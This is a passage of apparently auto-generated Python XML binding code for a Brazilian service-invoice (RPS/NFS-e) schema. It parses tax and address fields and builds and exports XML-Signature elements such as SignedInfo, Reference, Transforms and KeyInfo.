self.TipoBairroTomador = TipoBairroTomador_
# validate type tpTipoBairro
self.validate_tpTipoBairro(self.TipoBairroTomador)
elif nodeName_ == 'BairroTomador':
BairroTomador_ = child_.text
BairroTomador_ = self.gds_validate_string(BairroTomador_, node, 'BairroTomador')
self.BairroTomador = BairroTomador_
# validate type tpBairro
self.validate_tpBairro(self.BairroTomador)
elif nodeName_ == 'CidadeTomador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CidadeTomador')
self.CidadeTomador = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.CidadeTomador)
elif nodeName_ == 'CidadeTomadorDescricao':
CidadeTomadorDescricao_ = child_.text
CidadeTomadorDescricao_ = self.gds_validate_string(CidadeTomadorDescricao_, node, 'CidadeTomadorDescricao')
self.CidadeTomadorDescricao = CidadeTomadorDescricao_
# validate type tpCidadeTomadorDescricao
self.validate_tpCidadeTomadorDescricao(self.CidadeTomadorDescricao)
elif nodeName_ == 'CEPTomador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CEPTomador')
self.CEPTomador = ival_
# validate type tpCEP
self.validate_tpCEP(self.CEPTomador)
elif nodeName_ == 'EmailTomador':
EmailTomador_ = child_.text
EmailTomador_ = self.gds_validate_string(EmailTomador_, node, 'EmailTomador')
self.EmailTomador = EmailTomador_
# validate type tpEmail
self.validate_tpEmail(self.EmailTomador)
elif nodeName_ == 'CodigoAtividade':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CodigoAtividade')
self.CodigoAtividade = ival_
# validate type tpCodigoAtividade
self.validate_tpCodigoAtividade(self.CodigoAtividade)
elif nodeName_ == 'AliquotaAtividade':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaAtividade')
self.AliquotaAtividade = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaAtividade)
elif nodeName_ == 'TipoRecolhimento':
TipoRecolhimento_ = child_.text
TipoRecolhimento_ = self.gds_validate_string(TipoRecolhimento_, node, 'TipoRecolhimento')
self.TipoRecolhimento = TipoRecolhimento_
# validate type tpTipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
elif nodeName_ == 'MunicipioPrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'MunicipioPrestacao')
self.MunicipioPrestacao = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.MunicipioPrestacao)
elif nodeName_ == 'MunicipioPrestacaoDescricao':
MunicipioPrestacaoDescricao_ = child_.text
MunicipioPrestacaoDescricao_ = self.gds_validate_string(MunicipioPrestacaoDescricao_, node, 'MunicipioPrestacaoDescricao')
self.MunicipioPrestacaoDescricao = MunicipioPrestacaoDescricao_
# validate type tpCidadeDescricao
self.validate_tpCidadeDescricao(self.MunicipioPrestacaoDescricao)
elif nodeName_ == 'Operacao':
Operacao_ = child_.text
Operacao_ = self.gds_validate_string(Operacao_, node, 'Operacao')
self.Operacao = Operacao_
# validate type tpOperacao
self.validate_tpOperacao(self.Operacao)
elif nodeName_ == 'Tributacao':
Tributacao_ = child_.text
Tributacao_ = self.gds_validate_string(Tributacao_, node, 'Tributacao')
self.Tributacao = Tributacao_
# validate type tpTributacao
self.validate_tpTributacao(self.Tributacao)
elif nodeName_ == 'ValorPIS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorPIS')
self.ValorPIS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorPIS)
elif nodeName_ == 'ValorCOFINS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorCOFINS')
self.ValorCOFINS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorCOFINS)
elif nodeName_ == 'ValorINSS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorINSS')
self.ValorINSS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorINSS)
elif nodeName_ == 'ValorIR':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorIR')
self.ValorIR = fval_
# validate type tpValor
self.validate_tpValor(self.ValorIR)
elif nodeName_ == 'ValorCSLL':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorCSLL')
self.ValorCSLL = fval_
# validate type tpValor
self.validate_tpValor(self.ValorCSLL)
elif nodeName_ == 'AliquotaPIS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaPIS')
self.AliquotaPIS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaPIS)
elif nodeName_ == 'AliquotaCOFINS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaCOFINS')
self.AliquotaCOFINS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaCOFINS)
elif nodeName_ == 'AliquotaINSS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaINSS')
self.AliquotaINSS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaINSS)
elif nodeName_ == 'AliquotaIR':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaIR')
self.AliquotaIR = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaIR)
elif nodeName_ == 'AliquotaCSLL':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaCSLL')
self.AliquotaCSLL = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaCSLL)
elif nodeName_ == 'DescricaoRPS':
DescricaoRPS_ = child_.text
DescricaoRPS_ = self.gds_validate_string(DescricaoRPS_, node, 'DescricaoRPS')
self.DescricaoRPS = DescricaoRPS_
# validate type tpDescricaoRPS
self.validate_tpDescricaoRPS(self.DescricaoRPS)
elif nodeName_ == 'DDDPrestador':
DDDPrestador_ = child_.text
DDDPrestador_ = self.gds_validate_string(DDDPrestador_, node, 'DDDPrestador')
self.DDDPrestador = DDDPrestador_
# validate type tpDDDNulo
self.validate_tpDDDNulo(self.DDDPrestador)
elif nodeName_ == 'TelefonePrestador':
TelefonePrestador_ = child_.text
TelefonePrestador_ = self.gds_validate_string(TelefonePrestador_, node, 'TelefonePrestador')
self.TelefonePrestador = TelefonePrestador_
# validate type tpFoneNulo
self.validate_tpFoneNulo(self.TelefonePrestador)
elif nodeName_ == 'DDDTomador':
DDDTomador_ = child_.text
DDDTomador_ = self.gds_validate_string(DDDTomador_, node, 'DDDTomador')
self.DDDTomador = DDDTomador_
# validate type tpDDDNulo
self.validate_tpDDDNulo(self.DDDTomador)
elif nodeName_ == 'TelefoneTomador':
TelefoneTomador_ = child_.text
TelefoneTomador_ = self.gds_validate_string(TelefoneTomador_, node, 'TelefoneTomador')
self.TelefoneTomador = TelefoneTomador_
# validate type tpFoneNulo
self.validate_tpFoneNulo(self.TelefoneTomador)
elif nodeName_ == 'MotCancelamento':
MotCancelamento_ = child_.text
MotCancelamento_ = self.gds_validate_string(MotCancelamento_, node, 'MotCancelamento')
self.MotCancelamento = MotCancelamento_
# validate type tpMotCancelamento
self.validate_tpMotCancelamento(self.MotCancelamento)
elif nodeName_ == 'CPFCNPJIntermediario':
CPFCNPJIntermediario_ = child_.text
CPFCNPJIntermediario_ = self.gds_validate_string(CPFCNPJIntermediario_, node, 'CPFCNPJIntermediario')
self.CPFCNPJIntermediario = CPFCNPJIntermediario_
# validate type tpCPFCNPJnulo
self.validate_tpCPFCNPJnulo(self.CPFCNPJIntermediario)
elif nodeName_ == 'Deducoes':
obj_ = tpListaDeducoes.factory()
obj_.build(child_)
self.Deducoes = obj_
obj_.original_tagname_ = 'Deducoes'
elif nodeName_ == 'Itens':
obj_ = tpListaItens.factory()
obj_.build(child_)
self.Itens = obj_
obj_.original_tagname_ = 'Itens'
# end class tpRPS
class SignatureType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, SignedInfo=None, SignatureValue=None, KeyInfo=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.SignedInfo = SignedInfo
self.SignatureValue = SignatureValue
self.KeyInfo = KeyInfo
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, SignatureType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if SignatureType.subclass:
return SignatureType.subclass(*args_, **kwargs_)
else:
return SignatureType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.SignedInfo is not None or
self.SignatureValue is not None or
self.KeyInfo is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='SignatureType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('SignatureType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='SignatureType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='SignatureType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='SignatureType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.SignedInfo is not None:
self.SignedInfo.export(outfile, level, namespace_, name_='SignedInfo', pretty_print=pretty_print)
if self.SignatureValue is not None:
self.SignatureValue.export(outfile, level, namespace_, name_='SignatureValue', pretty_print=pretty_print)
if self.KeyInfo is not None:
self.KeyInfo.export(outfile, level, namespace_, name_='KeyInfo', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'SignedInfo':
obj_ = SignedInfoType.factory()
obj_.build(child_)
self.SignedInfo = obj_
obj_.original_tagname_ = 'SignedInfo'
elif nodeName_ == 'SignatureValue':
obj_ = SignatureValueType.factory()
obj_.build(child_)
self.SignatureValue = obj_
obj_.original_tagname_ = 'SignatureValue'
elif nodeName_ == 'KeyInfo':
obj_ = KeyInfoType.factory()
obj_.build(child_)
self.KeyInfo = obj_
obj_.original_tagname_ = 'KeyInfo'
# end class SignatureType
class SignatureValueType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, valueOf_=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, SignatureValueType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if SignatureValueType.subclass:
return SignatureValueType.subclass(*args_, **kwargs_)
else:
return SignatureValueType(*args_, **kwargs_)
factory = staticmethod(factory)
    def hasContent_(self):
        # Numeric values (including zero) always count as content; any other
        # value is tested for truthiness, so None or '' means no content.
        if type(self.valueOf_) in [int, float]:
            return True
        return bool(self.valueOf_)
def export(self, outfile, level, namespace_='ns1:', name_='SignatureValueType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('SignatureValueType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureValueType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='SignatureValueType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='SignatureValueType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='SignatureValueType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class SignatureValueType
class SignedInfoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, CanonicalizationMethod=None, SignatureMethod=None, Reference=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.CanonicalizationMethod = CanonicalizationMethod
self.SignatureMethod = SignatureMethod
self.Reference = Reference
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, SignedInfoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if SignedInfoType.subclass:
return SignedInfoType.subclass(*args_, **kwargs_)
else:
return SignedInfoType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.CanonicalizationMethod is not None or
self.SignatureMethod is not None or
self.Reference is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='SignedInfoType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('SignedInfoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignedInfoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='SignedInfoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='SignedInfoType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='SignedInfoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.CanonicalizationMethod is not None:
self.CanonicalizationMethod.export(outfile, level, namespace_, name_='CanonicalizationMethod', pretty_print=pretty_print)
if self.SignatureMethod is not None:
self.SignatureMethod.export(outfile, level, namespace_, name_='SignatureMethod', pretty_print=pretty_print)
if self.Reference is not None:
self.Reference.export(outfile, level, namespace_, name_='Reference', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'CanonicalizationMethod':
obj_ = CanonicalizationMethodType.factory()
obj_.build(child_)
self.CanonicalizationMethod = obj_
obj_.original_tagname_ = 'CanonicalizationMethod'
elif nodeName_ == 'SignatureMethod':
obj_ = SignatureMethodType.factory()
obj_.build(child_)
self.SignatureMethod = obj_
obj_.original_tagname_ = 'SignatureMethod'
elif nodeName_ == 'Reference':
obj_ = ReferenceType.factory()
obj_.build(child_)
self.Reference = obj_
obj_.original_tagname_ = 'Reference'
# end class SignedInfoType
class ReferenceType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, URI=None, Type=None, Transforms=None, DigestMethod=None, DigestValue=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.URI = _cast(None, URI)
self.Type = _cast(None, Type)
self.Transforms = Transforms
self.DigestMethod = DigestMethod
self.DigestValue = DigestValue
self.validate_DigestValueType(self.DigestValue)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ReferenceType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ReferenceType.subclass:
return ReferenceType.subclass(*args_, **kwargs_)
else:
return ReferenceType(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_DigestValueType(self, value):
# Validate type DigestValueType, a restriction on base64Binary.
if value is not None and Validate_simpletypes_:
pass
def hasContent_(self):
if (
self.Transforms is not None or
self.DigestMethod is not None or
self.DigestValue is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='ReferenceType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ReferenceType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ReferenceType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='ReferenceType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='ReferenceType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
if self.URI is not None and 'URI' not in already_processed:
already_processed.add('URI')
outfile.write(' URI=%s' % (quote_attrib(self.URI), ))
if self.Type is not None and 'Type' not in already_processed:
already_processed.add('Type')
outfile.write(' Type=%s' % (quote_attrib(self.Type), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='ReferenceType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Transforms is not None:
self.Transforms.export(outfile, level, namespace_, name_='Transforms', pretty_print=pretty_print)
if self.DigestMethod is not None:
self.DigestMethod.export(outfile, level, namespace_, name_='DigestMethod', pretty_print=pretty_print)
if self.DigestValue is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DigestValue>%s</ns1:DigestValue>%s' % (self.gds_format_base64(self.DigestValue, input_name='DigestValue'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
value = find_attr_value_('URI', node)
if value is not None and 'URI' not in already_processed:
already_processed.add('URI')
self.URI = value
value = find_attr_value_('Type', node)
if value is not None and 'Type' not in already_processed:
already_processed.add('Type')
self.Type = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Transforms':
obj_ = TransformsType.factory()
obj_.build(child_)
self.Transforms = obj_
obj_.original_tagname_ = 'Transforms'
elif nodeName_ == 'DigestMethod':
obj_ = DigestMethodType.factory()
obj_.build(child_)
self.DigestMethod = obj_
obj_.original_tagname_ = 'DigestMethod'
elif nodeName_ == 'DigestValue':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'DigestValue')
else:
bval_ = None
self.DigestValue = bval_
# validate type DigestValueType
self.validate_DigestValueType(self.DigestValue)
# end class ReferenceType
class TransformsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Transform=None):
self.original_tagname_ = None
if Transform is None:
self.Transform = []
else:
self.Transform = Transform
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TransformsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TransformsType.subclass:
return TransformsType.subclass(*args_, **kwargs_)
else:
return TransformsType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Transform
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='TransformsType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TransformsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='TransformsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='TransformsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='TransformsType'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='TransformsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Transform_ in self.Transform:
Transform_.export(outfile, level, namespace_, name_='Transform', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Transform':
obj_ = TransformType.factory()
obj_.build(child_)
self.Transform.append(obj_)
obj_.original_tagname_ = 'Transform'
# end class TransformsType
class TransformType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None, XPath=None):
self.original_tagname_ = None
self.Algorithm = _cast(None, Algorithm)
if XPath is None:
self.XPath = []
else:
self.XPath = XPath
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TransformType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TransformType.subclass:
return TransformType.subclass(*args_, **kwargs_)
else:
return TransformType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.XPath
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='TransformType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TransformType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='TransformType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='TransformType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='TransformType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (quote_attrib(self.Algorithm), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='TransformType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for XPath_ in self.XPath:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:XPath>%s</ns1:XPath>%s' % (self.gds_encode(self.gds_format_string(quote_xml(XPath_), input_name='XPath')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'XPath':
XPath_ = child_.text
XPath_ = self.gds_validate_string(XPath_, node, 'XPath')
self.XPath.append(XPath_)
# end class TransformType
class KeyInfoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, X509Data=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.X509Data = X509Data
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, KeyInfoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if KeyInfoType.subclass:
return KeyInfoType.subclass(*args_, **kwargs_)
else:
return KeyInfoType(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.X509Data is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='KeyInfoType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('KeyInfoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='KeyInfoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='KeyInfoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='KeyInfoType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (quote_attrib(self.Id), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='KeyInfoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.X509Data is not None:
self.X509Data.export(outfile, level, namespace_, name_='X509Data', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
